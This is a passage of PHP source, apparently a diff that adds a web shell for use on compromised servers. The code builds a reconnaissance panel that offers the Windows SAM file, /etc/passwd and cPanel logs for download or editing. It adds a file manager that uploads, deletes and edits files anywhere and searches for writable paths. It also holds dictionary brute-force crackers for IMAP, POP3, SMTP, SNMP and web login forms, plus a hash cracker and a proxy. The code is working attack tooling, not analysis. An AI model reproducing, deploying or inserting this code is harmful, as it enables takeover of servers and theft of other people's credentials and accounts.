cellpadding=0 cellspacing=0 style=\"border-collapse: collapse\" bordercolor=\"#282828\" bgcolor=\"#333333\" width=\"100%\"><tr><td>Server information:</td></tr><tr><td width=\"25%\" bgcolor=\"#666666\">Server:</td><td bgcolor=\"#666666\">".$_SERVER["HTTP_HOST"]; if (!empty($_SERVER["SERVER_ADDR"])){ echo "(". $_SERVER["SERVER_ADDR"] .")";}echo "</td></tr><tr><td width=\"25%\" bgcolor=\"#808080\">Operation system:</td><td bgcolor=\"#808080\">$os$osver</td></tr><tr><td width=\"25%\" bgcolor=\"#666666\">Web server application:</td><td bgcolor=\"#666666\">$software</td></tr><tr><td width=\"25%\" bgcolor=\"#808080\">CPU:</td><td bgcolor=\"#808080\">$CPU</td></tr><td width=\"25%\" bgcolor=\"#666666\">Disk status:</td><td bgcolor=\"#666666\">$disksize</td></tr><tr><td width=\"25%\" bgcolor=\"#808080\">User domain:</td><td bgcolor=\"#808080\">";if (!empty($_SERVER['USERDOMAIN'])) echo $_SERVER['USERDOMAIN'];else echo "Unknow"; echo "</td></tr><tr><td width=\"25%\" bgcolor=\"#666666\">User name:</td><td bgcolor=\"#666666\">";$cuser=get_current_user();if (!empty($cuser)) echo get_current_user();else echo "Unknow"; echo "</td></tr>"; +if ($windows){ +echo "<tr><td width=\"25%\" bgcolor=\"#808080\">Windows directory:</td><td bgcolor=\"#808080\"><a href=\"".hlinK("seC=fm&workingdiR=$sysroot")."\">$sysroot</a></td></tr><tr><td width=\"25%\" bgcolor=\"#666666\">Sam file:</td><td bgcolor=\"#666666\">";if (is_readable(($sam)))echo "<a href=\"".hlinK("?workingdiR=$sysroot\\system32\\config&downloaD=sam")."\">Readable</a>"; else echo "Not readable";echo "</td></tr>"; +} +else +{ +echo "<tr><td width=\"25%\" bgcolor=\"#808080\">Passwd file:</td><td bgcolor=\"#808080\">"; +if (is_readable('/etc/passwd')) echo "<a href=\"".hlinK("seC=edit&filE=/etc/passwd&workingdiR=$cwd")."\">Readable</a>"; else echo'Not readable';echo "</td></tr><tr><td width=\"25%\" bgcolor=\"#666666\">Cpanel log file:</td><td bgcolor=\"#666666\">"; +if (file_exists("/var/cpanel/accounting.log")){if (is_readable("/var/cpanel/accounting.log")) echo "<a href=\"".hlinK("seC=edit&filE=/var/cpanel/accounting.log&workingdiR=$cwd")."\">Readable</a>"; else echo "Not readable";}else echo "Not found"; +echo "</td></tr>"; +} +$uip =(!empty($_SERVER['REMOTE_ADDR']))?$_SERVER['REMOTE_ADDR']:getenv('REMOTE_ADDR'); +echo "<tr><td width=\"25%\" bgcolor=\"#808080\">${mil}PHP\">PHP</a> version:</td><td bgcolor=\"#808080\"><a href=\"?=".php_logo_guid()."\" target=\"_blank\">".PHP_VERSION."</a> (<a href=\"".hlinK("seC=phpinfo&workingdiR=$cwd")."\">more...</a>)</td></tr><tr><td width=\"25%\" bgcolor=\"#666666\">Zend version:</td><td bgcolor=\"#666666\">";if (function_exists('zend_version')) echo "<a href=\"?=".zend_logo_guid()."\" target=\"_blank\">".zend_version()."</a>";else echo "Not Found";echo "</td><tr><td width=\"25%\" bgcolor=\"#808080\">Include path:</td><td bgcolor=\"#808080\">".str_replace($inpa," ",DEFAULT_INCLUDE_PATH)."</td><tr><td width=\"25%\" bgcolor=\"#666666\">PHP Modules:</td><td bgcolor=\"#666666\">";$ext=get_loaded_extensions();foreach($ext as $v)echo $v." ";echo "</td><tr><td width=\"25%\" bgcolor=\"#808080\">Disabled functions:</td><td bgcolor=\"#808080\">";if(!empty($disablefunctions))echo $disablefunctions;else echo "Nothing"; echo"</td></tr><tr><td width=\"25%\" bgcolor=\"#666666\">Safe mode:</td><td bgcolor=\"#666666\">$safemode</td></tr><tr><td width=\"25%\" bgcolor=\"#808080\">Open base dir:</td><td bgcolor=\"#808080\">$basedir</td></tr><tr><td width=\"25%\" bgcolor=\"#666666\">DBMS:</td><td bgcolor=\"#666666\">";$sq="";if(function_exists('mysql_connect')) $sq= "${mil}MySQL\">MySQL</a> ";if(function_exists('mssql_connect')) $sq.= " ${mil}MSSQL\">MSSQL</a> ";if(function_exists('ora_logon')) $sq.= " ${mil}Oracle\">Oracle</a> ";if(function_exists('sqlite_open')) $sq.= " SQLite ";if(function_exists('pg_connect')) $sq.= " ${mil}PostgreSQL\">PostgreSQL</a> ";if(function_exists('msql_connect')) $sq.= " mSQL ";if(function_exists('mysqli_connect'))$sq.= " MySQLi ";if(function_exists('ovrimos_connect')) $sq.= " Ovrimos SQL ";if ($sq=="") $sq= "Nothing"; echo "$sq</td></tr>";if (function_exists('curl_init')) echo "<tr><td width=\"25%\" bgcolor=\"#808080\">cURL support:</td><td bgcolor=\"#808080\">Enabled ";if(function_exists('curl_version')){$ver=curl_version();echo "(Version:". $ver['version']." OpenSSL version:". $ver['ssl_version']." zlib version:". $ver['libz_version']." host:". $ver['host'] .")";}echo "</td></tr>";echo "<tr><td>User information:</td></tr><tr><td width=\"25%\" bgcolor=\"#666666\">IP:</td><td bgcolor=\"#666666\">$uip</td></tr><tr><td width=\"25%\" bgcolor=\"#808080\">Agent:</td><td bgcolor=\"#808080\">".getenv('HTTP_USER_AGENT')."</td></tr></table>"; +} +function checksuM($file){ +global $et; +echo "<table border=0 style=\"border-collapse: collapse\" bordercolor=\"#282828\" width=\"100%\"><tr><td width=\"10%\" bgcolor=\"#666666\"><b>MD5:</b> <font color=#F0F0F0>".md5_file($file)."</font><br><b>SHA1:</b> <font color=#F0F0F0>".sha1_file($file)."</font>$et"; +} +function listdiR($cwd,$task){ +$c= getcwd(); +$dh = opendir($cwd); +while ($cont=readdir($dh)){ +if($cont=='.' || $cont=='..')continue; +$adr = $cwd.DIRECTORY_SEPARATOR.$cont; +switch ($task){ +case '0':if(is_file($adr))echo "[<a href=\"".hlinK("seC=edit&filE=$adr&workingdiR=$c")."\">$adr</a>]\n";if(is_dir($adr))echo "[<a href=\"".hlinK("seC=fm&workingdiR=$adr")."\">$adr</a>]\n";break; +case '1':if(is_writeable($adr))if(is_file($adr))echo "[<a href=\"".hlinK("seC=edit&filE=$adr&workingdiR=$c")."\">$adr</a>]\n";if(is_dir($adr))echo "[<a href=\"".hlinK("seC=fm&workingdiR=$adr")."\">$adr</a>]\n";break; +case '2':if(is_file($adr) && is_writeable($adr))echo "[<a href=\"".hlinK("seC=edit&filE=$adr&workingdiR=$c")."\">$adr</a>]\n";break; +case '3':if(is_dir($adr) && is_writeable($adr))echo "[<a href=\"".hlinK("seC=fm&workingdiR=$adr")."\">$adr</a>]\n";break; +case '4':if(is_file($adr))echo "[<a href=\"".hlinK("seC=edit&filE=$adr&workingdiR=$c")."\">$adr</a>]\n";break; +case '5':if(is_dir($adr))echo "[<a href=\"".hlinK("seC=fm&workingdiR=$adr")."\">$adr</a>]\n";break; +case '6':if(preg_match("@".$_REQUEST['search']."@",$cont)){if(is_file($adr))echo "[<a href=\"".hlinK("seC=edit&filE=$adr&workingdiR=$c")."\">$adr</a>]\n";if(is_dir($adr))echo "[<a href=\"".hlinK("seC=fm&workingdiR=$adr")."\">$adr</a>]\n";}break; +case '7':if(strstr($cont,$_REQUEST['search'])){if(is_file($adr))echo "[<a href=\"".hlinK("seC=edit&filE=$adr&workingdiR=$c")."\">$adr</a>]\n";if(is_dir($adr))echo "[<a href=\"".hlinK("seC=fm&workingdiR=$adr")."\">$adr</a>]\n";}break; +} +if (is_dir($adr)) listdiR($adr,$_REQUEST['task']); +} +} +if (!function_exists("posix_getpwuid") && !strstr($disablefunctions,'posix_getpwuid')) {function posix_getpwuid($u) {return 0;}} +if (!function_exists("posix_getgrgid") && !strstr($disablefunctions,'posix_getgrgid')) {function posix_getgrgid($g) {return 0;}} +function filemanager(){ +global $windows,$msgbox,$errorbox,$t,$et,$hcwd; +$cwd= getcwd(); +$table = "<table border=0 cellpadding=0 cellspacing=0 style=\"border-collapse: collapse\" bordercolor=\"#282828\" bgcolor=\"#333333\" width=\"100%\">"; +$td1n="<td width=\"22%\" bgcolor=\"#666666\">"; +$td2m="<td width=\"22%\" bgcolor=\"#808080\">"; +$td1i="<td width=\"5%\" bgcolor=\"#666666\">"; +$td2i="<td width=\"5%\" bgcolor=\"#808080\">"; +$tdnr="<td width=\"22%\" bgcolor=\"#800000\">"; +$tdw="<td width=\"22%\" bgcolor=\"#006E00\">"; +if (!empty($_REQUEST['task'])){ +if (!empty($_REQUEST['search'])) $_REQUEST['task'] = 7; +if (!empty($_REQUEST['re'])) $_REQUEST['task'] = 6; +echo "<font color=blue><pre>"; +listdiR($cwd,$_REQUEST['task']); +echo "</pre></font>"; +}else{ +if (!empty($_REQUEST['cP']) || !empty($_REQUEST['mV'])|| !empty($_REQUEST['rN'])){ +if (!empty($_REQUEST['cP']) || !empty($_REQUEST['mV'])){ +$title="Destination"; +$ad = (!empty($_REQUEST['cP']))?$_REQUEST['cP']:$_REQUEST['mV']; +$dis =(!empty($_REQUEST['cP']))?'Copy':'Move'; +}else{ +$ad = $_REQUEST['rN']; +$title ="New name"; +$dis = "Rename"; +} +if (!!empty($_REQUEST['deS'])){ +echo "<center><table border=0 style=\"border-collapse: collapse\" bordercolor=\"#282828\" width=\"40%\"><tr><td width=\"100%\" bgcolor=\"#333333\">$title:</td></tr><tr>$td1n<form method=\"POST\"><input type=text value=\"";if(empty($_REQUEST['rN'])) echo $cwd; echo "\" size=60 name=deS></td></tr><tr>$td2m$hcwd<input type=hidden value=\"".htmlspecialchars($ad)."\" name=cp><input class=buttons type=submit value=$dis></td></tr></form></table></center>"; +}else{ +if (!empty($_REQUEST['rN'])) renamE($ad,$_REQUEST['deS']); +else{ +copy($ad,$_REQUEST['deS']); +if (!empty($_REQUEST['mV']))unlink($ad); +} +} +} +if (!empty($_REQUEST['deL'])) { if (is_file($_REQUEST['deL'])|| is_link($_REQUEST['deL'])) unlink($_REQUEST['deL']);elseif(is_dir($_REQUEST['deL'])) { +$dh = opendir($_REQUEST['deL']); +$d=""; +while ($cont=readdir($dh)){$d++;} +if ($d>2) echo "$errorbox\"".htmlspecialchars($_REQUEST['del'])."\" is not empty!<td><tr></table><br>";else rmdir($_REQUEST['del']);}} +if (!empty($_FILES['uploadfile'])){ +move_uploaded_file($_FILES['uploadfile']['tmp_name'],$_FILES['uploadfile']['name']); +echo "$msgbox<b>Uploaded!</b> File name: ".$_FILES['uploadfile']['name']." File size: ".$_FILES['uploadfile']['size']. "$et<br>"; +} +$select = "<select onChange=\"window.location=this.options[this.selectedIndex].value;\"><option value=\"".hlinK("seC=fm&workingdiR=$cwd")."\">--------</option><option value=\""; +if (!empty($_REQUEST['newf'])){ +if (!empty($_REQUEST['newfile'])){file_put_contents($_REQUEST['newf'],"");} +if (!empty($_REQUEST['newdir'])){mkdir($_REQUEST['newf']);} +} +if ($windows){ +echo "$table<td><b>Drives:</b> "; +for ($i=66;$i<=90;$i++){$drive= chr($i).':'; +if (is_dir($drive."\\")){$vol=shelL("vol $drive");if(empty($vol))$vol=$drive;echo " <a title=\"$vol\" href=".hlinK("seC=fm&workingdiR=$drive\\").">$drive\\</a>";} +} +echo $et; +} +echo "$table<form method=\"POST\"><tr><td width=\"20%\"><b>Location:</b><input type=text name=workingdiR size=135 value=\"".getcwd()."\"><input class=buttons type=submit value=Change></td></tr></form></table>"; +$file=array();$dir=array();$link=array(); +if($dirhandle = opendir($cwd)){ +while ($cont=readdir($dirhandle)){ +if (is_dir($cwd.DIRECTORY_SEPARATOR.$cont)) $dir[]= $cont; +elseif (is_file($cwd.DIRECTORY_SEPARATOR.$cont)) $file[]=$cont; +else $link[]=$cont; +} +closedir($dirhandle); +sort($file);sort($dir);sort($link); +echo "<table border=1 cellpadding=0 cellspacing=0 style=\"border-collapse: collapse\" bordercolor=\"#282828\" bgcolor=\"#333333\" width=\"100%\"><tr><td width=\"30%\" bgcolor=\"#333333\" align=\"center\">Name</td><td width=\"13%\" bgcolor=\"#333333\" align=\"center\">Owner</td><td width=\"12%\" bgcolor=\"#333333\" align=\"center\">Modification time</td><td width=\"12%\" bgcolor=\"#333333\" align=\"center\">Last change</td><td width=\"5%\" bgcolor=\"#333333\" align=\"center\">Info</td><td width=\"7%\" bgcolor=\"#333333\" align=\"center\">Size</td><td width=\"15%\" bgcolor=\"#333333\" align=\"center\">Actions</td></tr>"; +$i=0; +foreach($dir as $dn){ +echo "<tr>"; +$i++; +$own="Unknow"; +$owner=posix_getpwuid(fileowner($dn)); +$mdate=date("Y/m/d H:i:s",filemtime($dn)); +$adate=date("Y/m/d H:i:s",fileatime($dn)); +$diraction = $select.hlinK("seC=fm&workingdiR=".realpath($dn))."\">Open</option><option value=\"".hlinK("seC=fm&workingdiR=$cwd&rN=$dn")."\">Rename</option><option value=\"".hlinK("seC=fm&deL=$dn&workingdiR=$cwd")."\">Remove</option></select></td>"; +if ($owner) $own = "<a title=\" Shell: ".$owner['shell']."\" href=\"".hlinK("seC=fm&workingdiR=".$owner['dir'])."\">".$owner['name']."</a>"; +if (($i%2)==0){$cl1=$td1i;$cl2=$td1n;}else{$cl1=$td2i;$cl2=$td2m;} +if (is_writeable($dn)) echo $tdw;elseif (!is_readable($dn)) echo $tdnr;else echo $cl2; +echo "<a href=\"".hlinK("seC=fm&workingdiR=".realpath($dn))."\">"; +if (strlen($dn)>45)echo substr($dn,0,42)."...";else echo $dn;echo "</a>"; +echo $cl1."$own</td>"; +echo $cl1."$mdate</td>"; +echo $cl1."$adate</td>"; +echo "</td>${cl1}D";if (is_readable($dn)) echo "R";if (is_writeable($dn)) echo "W";echo "</td>"; +echo "$cl1------</td>"; +echo $cl2.$diraction; +echo "</tr>" ; +flusheR(); +} +foreach($file as $fn){ +echo "<tr>"; +$i++; +$own = "Unknow"; +$owner = posix_getpwuid(fileowner($fn)); +$fileaction=$select.hlinK("seC=openit&namE=$fn&workingdiR=$cwd")."\">Open</option><option value=\"".hlinK("seC=edit&filE=$fn&workingdiR=$cwd")."\">Edit</option><option value=\"".hlinK("seC=fm&downloaD=$fn&workingdiR=$cwd")."\">Download</option><option value=\"".hlinK("seC=hex&filE=$fn&workingdiR=$cwd")."\">Hex view</option><option value=\"".hlinK("seC=img&filE=$fn&workingdiR=$cwd")."\">image</option><option value=\"".hlinK("seC=inc&filE=$fn&workingdiR=$cwd")."\">Include</option><option value=\"".hlinK("seC=checksum&filE=$fn&workingdiR=$cwd")."\">Checksum</option><option value=\"".hlinK("seC=fm&workingdiR=$cwd&cP=$fn")."\">Copy</option><option value=\"".hlinK("seC=fm&workingdiR=$cwd&mV=$fn")."\">Move</option><option value=\"".hlinK("seC=fm&workingdiR=$cwd&rN=$fn")."\">Rename</option><option value=\"".hlinK("seC=fm&deL=$fn&workingdiR=$cwd")."\">Remove</option></select></td>"; +$mdate = date("Y/m/d H:i:s",filemtime($fn)); +$adate = date("Y/m/d H:i:s",fileatime($fn)); +if ($owner) $own = "<a title=\"Shell:".$owner['shell']."\" href=\"".hlinK("seC=fm&workingdiR=".$owner['dir'])."\">".$owner['name']."</a>"; +$size = showsizE(filesize($fn)); +if (($i%2)==0){$cl1=$td1i;$cl2=$td1n;}else{$cl1=$td2i;$cl2=$td2m;} +if (is_writeable($fn)) echo $tdw;elseif (!is_readable($fn)) echo $tdnr;else echo $cl2; +echo "<a href=\"".hlinK("seC=openit&namE=$fn&workingdiR=$cwd")."\">"; +if (strlen($fn)>45)echo substr($fn,0,42)."...";else echo $fn;echo "</a>"; +echo $cl1."$own</td>"; +echo $cl1."$mdate</td>"; +echo $cl1."$adate</td>"; +echo "</td>$cl1";if (is_readable($fn)) echo "R";if (is_writeable($fn)) echo "W";if (is_executable($fn)) echo "X";if (is_uploaded_file($fn)) echo "U"; echo "</td>"; +echo "$cl1$size</td>"; +echo $td2m.$fileaction; +echo "</tr>" ; +flusheR(); +} +foreach($link as $ln){ +$own = "Unknow"; +$i++; +$owner = posix_getpwuid(fileowner($ln)); +$linkaction=$select.hlinK("seC=openit&namE=$ln&workingdiR=$ln")."\">Open</option><option value=\"".hlinK("seC=edit&filE=$ln&workingdiR=$cwd")."\">Edit</option><option value=\"".hlinK("seC=fm&downloaD=$ln&workingdiR=$cwd")."\">Download</option><option value=\"".hlinK("seC=hex&filE=$ln&workingdiR=$cwd")."\">Hex view</option><option value=\"".hlinK("seC=img&filE=$ln&workingdiR=$cwd")."\">image</option><option value=\"".hlinK("seC=inc&filE=$ln&workingdiR=$cwd")."\">Include</option><option value=\"".hlinK("seC=checksum&filE=$ln&workingdiR=$cwd")."\">Checksum</option><option value=\"".hlinK("seC=fm&workingdiR=$cwd&cP=$ln")."\">Copy</option><option value=\"".hlinK("seC=fm&workingdiR=$cwd&mV=$ln")."\">Move</option><option value=\"".hlinK("seC=fm&workingdiR=$cwd&rN=$ln")."\">Rename</option><option value=\"".hlinK("seC=fm&deL=$ln&workingdiR=$cwd")."\">Remove</option></select></td>"; +$mdate = date("Y/m/d H:i:s",filemtime($ln)); +$adate = date("Y/m/d H:i:s",fileatime($ln)); +if ($owner) $own = "<a title=\"Shell: ".$owner['shell']."\" href=\"".hlinK("seC=fm&workingdiR=".$owner['dir'])."\">".$owner['name']."</a>"; +echo "<tr>"; +$size = showsizE(filesize($ln)); +if (($i%2)==0){$cl1=$td1i;$cl2=$td1n;}else{$cl1=$td2i;$cl2=$td2m;} +if (is_writeable($ln)) echo $tdw;elseif (!is_readable($ln)) echo $tdnr;else echo $cl2; +echo "<a href=\"".hlinK("seC=openit&namE=$ln&workingdiR=$cwd")."\">"; +if (strlen($ln)>45)echo substr($ln,0,42)."...";else echo $ln;echo "</a>"; +echo $cl1."$own</td>"; +echo $cl1."$mdate</td>"; +echo $cl1."$adate</td>"; +echo "</td>${cl1}L";if (is_readable($ln)) echo "R";if (is_writeable($ln)) echo "W";if (is_executable($ln)) echo "X"; echo "</td>"; +echo "$cl1$size</td>"; +echo $cl2.$linkaction; +echo "</tr>" ; +flusheR(); +} +} +$dc = count($dir)-2; +if($dc==-2)$dc=0; +$fc = count($file); +$lc = count($link); +$total = $dc + $fc + $lc; +echo "$table<tr><td><form method=POST>Find:<input type=text name=search><input type=checkbox name=re value=1 style=\"border-width:1px;background-color:#333333;\" checked>Regular expressions <input type=submit class=buttons value=Find>$hcwd<input type=hidden value=7 name=task></form></td><td><form method=POST>$hcwd<input type=hidden value=\"fm\" name=seC><select name=task><option value=0>Display files and directories in current folder</option><option value=1>Find writable files and directories in current folder</option><option value=2>Find writable files in current folder</option><option value=3>Find writable directories in current folder</option><option value=4>Display all files in current folder</option><option value=5>Display all directories in current folder</option></select><input type=submit class=buttons value=Do></form>$et</tr></table><table width=\"100%\"><tr><td width=\"50%\"><br><table bgcolor=#333333 border=0 width=\"65%\"><td><b>Summery:</b> Total: $total Directories: $dc Files: $fc Links: $lc</td></table><table bgcolor=#333333 border=0 width=\"65%\"><td width=\"100%\" bgcolor=";if (is_writeable($cwd)) echo "#006E00";elseif (!is_readable($cwd)) echo "#800000";else "#333333"; echo ">Current directory status: "; if (is_readable($cwd)) echo "R";if (is_writeable($cwd)) echo "W" ;echo "</td></table><table border=0 style=\"border-collapse: collapse\" bordercolor=\"#282828\" width=\"65%\"><tr><td width=\"100%\" bgcolor=\"#333333\">New:</td></tr><tr>$td1n<form method=\"POST\"><input type=text size=47 name=newf></td></tr><tr>$td2m$hcwd<input class=buttons type=submit name=newfile value=\"File\"><input class=buttons type=submit name=newdir value=\"Folder\"></td></tr></form></table></td><td width=\"50%\"><br>${t}Upload:</td></tr><tr>$td1n<form method=\"POST\" enctype=\"multipart/form-data\"><input type=file size=45 name=uploadfile></td></tr><tr>$td2m$hcwd<input class=buttons type=submit value=Upload></td></tr>$td1n Note: Max allowed file size to upload on this server is ".ini_get('upload_max_filesize')."</td></tr></form></table>$et"; +} +} +function imaplogiN($host,$username,$password){ +$sock=fsockopen($host,143,$n,$s,5); +$b=namE(); +$l=strlen($b); +if(!$sock)return -1; +fread($sock,1024); +fputs($sock,"$b LOGIN $username $password\r\n"); +$res=fgets($sock,$l+4); +if ($res == "$b OK")return 1;else return 0; +fclose($sock); +} +function pop3logiN($server,$user,$pass){ +$sock=fsockopen($server,110,$en,$es,5); +if(!$sock)return -1; +fread($sock,1024); +fwrite($sock,"user $user\n"); +$r=fgets($sock); +if($r{0}=='-')return 0; +fwrite($sock,"pass $pass\n"); +$r=fgets($sock); +fclose($sock); +if($r{0}=='+')return 1; +return 0; +} +function imapcrackeR(){ +global $t,$et,$errorbox,$crack; +if (!empty($_REQUEST['target']) && !empty($_REQUEST['dictionary'])){ +$target=$_REQUEST['target']; +$type=$_REQUEST['combo']; +$user=(!empty($_REQUEST['user']))?$_REQUEST['user']:""; +$dictionary=fopen($_REQUEST['dictionary'],'r'); +if ($dictionary){ +echo "<font color=blue>Cracking ".htmlspecialchars($target)."...<br>";flusheR(); +while(!feof($dictionary)){ +if($type){ +$combo=trim(fgets($dictionary)," \n\r"); +$user=substr($combo,0,strpos($combo,':')); +$pass=substr($combo,strpos($combo,':')+1); +}else{ +$pass=trim(fgets($dictionary)," \n\r"); +} +$imap=imaplogiN($target,$user,$pass); +if($imap==-1){echo "$errorbox Can not connect to server.$et";break;}else{ +if ($imap){echo "U: $user P: $pass<br>";if(!$type)break;}} +flusheR(); +} +echo "<br>Done</font>"; +fclose($dictionary); +} +else{ +echo "$errorbox Can not open dictionary.$et"; +} +}else echo "<center>${t}IMAP cracker:$crack"; +} +function snmpcrackeR(){ +global $t,$et,$errorbox,$crack,$hcwd; +if (!empty($_REQUEST['target']) && !empty($_REQUEST['dictionary'])){ +$target=$_REQUEST['target']; +$dictionary=fopen($_REQUEST['dictionary'],'r'); +if ($dictionary){ +echo "<font color=blue>Cracking ".htmlspecialchars($target)."...<br>";flusheR(); +while(!feof($dictionary)){ +$com=trim(fgets($dictionary)," \n\r"); +$res=snmpchecK($target,$com,2); +if($res)echo "$com<br>"; +flusheR(); +} +echo "<br>Done</font>"; +fclose($dictionary); +} +else{ +echo "$errorbox Can not open dictionary.$et"; +} +}else echo "<center>${t}SNMP cracker:</td><td bgcolor=\"#333333\"></td></tr><form method=\"POST\">$hcwd<tr><td width=\"20%\" bgcolor=\"#666666\">Dictionary:</td><td bgcolor=\"#666666\"><input type=text name=dictionary size=35></td></tr><tr><td width=\"20%\" bgcolor=\"#808080\">Server:</td><td bgcolor=\"#808080\"><input type=text name=target size=35></td></tr><tr><td width=\"20%\" bgcolor=\"#666666\"></td><td bgcolor=\"#666666\" align=right><input class=buttons type=submit value=Start></td></tr></form></table></center>"; +} +function pop3crackeR(){ +global $t,$et,$errorbox,$crack; +if (!empty($_REQUEST['target']) && !empty($_REQUEST['dictionary'])){ +$target=$_REQUEST['target']; +$type=$_REQUEST['combo']; +$user=(!empty($_REQUEST['user']))?$_REQUEST['user']:""; +$dictionary=fopen($_REQUEST['dictionary'],'r'); +if ($dictionary){ +echo "<font color=blue>Cracking ".htmlspecialchars($target)."...<br>";flusheR(); +while(!feof($dictionary)){ +if($type){ +$combo=trim(fgets($dictionary)," \n\r"); +$user=substr($combo,0,strpos($combo,':')); +$pass=substr($combo,strpos($combo,':')+1); +}else{ +$pass=trim(fgets($dictionary)," \n\r"); +} +$pop3=pop3logiN($target,$user,$pass); +if($pop3==-1){echo "$errorbox Can not connect to server.$et";break;} else{ +if ($pop3){echo "U: $user P: $pass<br>";if(!$type)break;}} +flusheR(); +} +echo "<br>Done</font>"; +fclose($dictionary); +} +else{ +echo "$errorbox Can not open dictionary.$et"; +} +}else echo "<center>${t}POP3 cracker:$crack"; +} +function smtpcrackeR(){ +global $t,$et,$errorbox,$crack; +if (!empty($_REQUEST['target']) && !empty($_REQUEST['dictionary'])){ +$target=$_REQUEST['target']; +$type=$_REQUEST['combo']; +$user=(!empty($_REQUEST['user']))?$_REQUEST['user']:""; +$dictionary=fopen($_REQUEST['dictionary'],'r'); +if ($dictionary){ +echo "<font color=blue>Cracking ".htmlspecialchars($target)."...<br>";flusheR(); +while(!feof($dictionary)){ +if($type){ +$combo=trim(fgets($dictionary)," \n\r"); +$user=substr($combo,0,strpos($combo,':')); +$pass=substr($combo,strpos($combo,':')+1); +}else{ +$pass=trim(fgets($dictionary)," \n\r"); +} +$smtp=smtplogiN($target,$user,$pass,5); +if($smtp==-1){echo "$errorbox Can not connect to server.$et";break;} else{ +if ($smtp){echo "U: $user P: $pass<br>";if(!$type)break;}} +flusheR(); +} +echo "<br>Done</font>"; +fclose($dictionary); +} +else{ +echo "$errorbox Can not open dictionary.$et"; +} +}else echo "<center>${t}SMTP cracker:$crack"; +} +function formcrackeR(){ +global $errorbox,$footer,$et,$hcwd; +if(!empty($_REQUEST['start'])){ +$url=$_REQUEST['target']; +$uf=$_REQUEST['userf']; +$pf=$_REQUEST['passf']; +$sf=$_REQUEST['submitf']; +$sv=$_REQUEST['submitv']; +$method=$_REQUEST['method']; +$fail=$_REQUEST['fail']; +$dic=$_REQUEST['dictionary']; +$type=$_REQUEST['combo']; +$user=(!empty($_REQUEST['user']))?$_REQUEST['user']:""; +if(!file_exists($dic)) die("$errorbox Can not open dictionary.$et$footer"); +$dictionary=fopen($dic,'r'); +echo "<font color=blue>Cracking started...<br>"; +while(!feof($dictionary)){ +if($type){ +$combo=trim(fgets($dictionary)," \n\r"); +$user=substr($combo,0,strpos($combo,':')); +$pass=substr($combo,strpos($combo,':')+1); +}else{ +$pass=trim(fgets($dictionary)," \n\r"); +} +$url.="?$uf=$user&$pf=$pass&$sf=$sv"; +$res=check_urL($url,$method,$fail,12); +if (!$res){echo "<font color=blue>U: $user P: $pass</font><br>";flusheR();if(!$type)break;} +flusheR(); +} +fclose($dictionary); +echo "Done!</font><br>"; +} +else echo "<center><table border=0 style=\"border-collapse: collapse\" bordercolor=\"#282828\" width=\"434\"><tr><td width=\"174\" bgcolor=\"#333333\">HTTP Form cracker:</td><td bgcolor=\"#333333\" width=\"253\"></td></tr><form method=\"POST\" name=form><tr><td width=\"174\" bgcolor=\"#666666\">Dictionary:</td><td bgcolor=\"#666666\" width=\"253\"><input type=text name=dictionary size=35></td></tr><tr><td width=\"174\" bgcolor=\"#808080\">Dictionary type:</td><td bgcolor=\"#808080\"><input type=radio name=combo checked value=0 onClick=\"document.form.user.disabled = false;\" style=\"border-width:1px;background-color:#808080;\">Simple (P)<input type=radio value=1 name=combo onClick=\"document.form.user.disabled = true;\" style=\"border-width:1px;background-color:#808080;\">Combo (U:P)</td></tr><tr><td width=\"174\" bgcolor=\"#666666\">Username:</td><td bgcolor=\"#666666\"><input type=text size=35 value=root name=user>$hcwd</td></tr><tr><td width=\"174\" bgcolor=\"#808080\">Action Page:</td><td bgcolor=\"#808080\" width=\"253\"><input type=text name=target value=\"http://".getenv('HTTP_HOST')."/login.php\" size=35></td></tr><tr><td width=\"174\" bgcolor=\"#666666\">Method:</td><td bgcolor=\"#666666\" width=\"253\"><select size=\"1\" name=\"method\"><option selected value=\"POST\">POST</option><option value=\"GET\">GET</option></select></td></tr><tr><td width=\"174\" bgcolor=\"#808080\">Username field name:</td><td bgcolor=\"#808080\" width=\"253\"><input type=text name=userf value=user size=35></td></tr><tr><td width=\"174\" bgcolor=\"#666666\">Password field name:</td><td bgcolor=\"#666666\" width=\"253\"><input type=text name=passf value=passwd size=35></td></tr><tr><td width=\"174\" bgcolor=\"#808080\">Submit name:</td><td bgcolor=\"#808080\" width=\"253\"><input type=text value=login name=submitf size=35></td></tr><tr><td width=\"174\" bgcolor=\"#666666\">Submit value:</td><td bgcolor=\"#666666\" width=\"253\"><input type=text value=\"Login\" name=submitv size=35></td></tr><tr><td width=\"174\" bgcolor=\"#808080\">Fail string:</td><td bgcolor=\"#808080\" width=\"253\"><input type=text name=fail value=\"Try again\" size=35></td></tr><tr><td width=\"174\" bgcolor=\"#666666\"></td><td bgcolor=\"#666666\" align=right width=\"253\"><input class=buttons type=submit name=start value=Start></td></tr></form></table></center>"; +} +function hashcrackeR(){ +global $errorbox,$t,$et,$hcwd; +if (!empty($_REQUEST['hash']) && !empty($_REQUEST['dictionary']) && !empty($_REQUEST['type'])){ +$dictionary=fopen($_REQUEST['dictionary'],'r'); +if ($dictionary){ +$hash=strtoupper($_REQUEST['hash']); +echo "<font color=blue>Cracking " . htmlspecialchars($hash)."...<br>";flusheR(); +$type=($_REQUEST['type']=='MD5')?'md5':'sha1'; +while(!feof($dictionary)){ +$word=trim(fgets($dictionary)," \n\r"); +if ($hash==strtoupper(($type($word)))){echo "The answer is $word<br>";break;} +} +echo "Done!</font>"; +fclose($dictionary); +} +else{ +echo "$errorbox Can not open dictionary.$et"; +} +} +echo "<center>${t}Hash cracker:</td><td bgcolor=\"#333333\"></td></tr><form method=\"POST\"><tr><td width=\"20%\" bgcolor=\"#666666\">Dictionary:</td><td bgcolor=\"#666666\"><input type=text name=dictionary size=35></td></tr><tr><td width=\"20%\" bgcolor=\"#808080\">Hash:</td><td bgcolor=\"#808080\"><input type=text name=hash size=35></td></tr><tr><td width=\"20%\" bgcolor=\"#666666\">Type:</td><td bgcolor=\"#666666\"><select name=type><option selected value=MD5>MD5</option><option value=SHA1>SHA1</option></select></td></tr><tr><td width=\"20%\" bgcolor=\"#808080\"></td><td bgcolor=\"#808080\" align=right>$hcwd<input class=buttons type=submit value=Start></td></tr></form></table></center>"; +} +function pr0xy(){ +global $errorbox,$et,$footer,$hcwd; +echo "<table border=0 cellpadding=0 cellspacing=0 style=\"border-collapse: collapse\" bordercolor=\"#282828\" bgcolor=\"#333333\" width=\"100%\"><form method=\"POST\"><tr><td width=\"20%\"><b>Navigator: </b><input type=text name=urL size=140 value=\""; if(!!empty($_REQUEST['urL'])) echo "http://www.edpsciences.org/htbin/ipaddress"; else echo htmlspecialchars($_REQUEST['urL']);echo 